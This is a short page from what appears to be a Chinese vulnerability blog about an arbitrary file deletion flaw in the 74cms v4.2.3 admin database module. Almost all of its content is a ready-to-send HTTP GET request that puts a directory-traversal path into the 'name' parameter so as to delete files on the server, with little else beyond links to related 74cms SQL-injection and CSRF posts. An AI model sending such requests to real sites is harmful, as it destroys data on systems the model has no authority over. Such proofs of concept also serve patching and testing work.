74cms v4.2.3 任意文件删除

释放双眼,带上耳机,听听看~!

[rihide]
[wm_red]GET /index.php?m=admin&c=database&a=del&name=/../../../../../ HTTP/1.1
Host: 0-sec.org
User-Agent: Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/index.php?m=admin&c=database&a=restore
Connection: close
Cookie: think_template=default; PHPSESSID=6d86a34ec9125b2d08ebbb7630838682; think_language=en
Upgrade-Insecure-Requests: 1[/wm_red]
[/rihide]

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
Web漏洞

74cms v5.0.1 前台sql注入

2020-10-17 18:54:39

Web漏洞

(CVE-2019-11374)74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞

2020-10-16 17:28:03

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索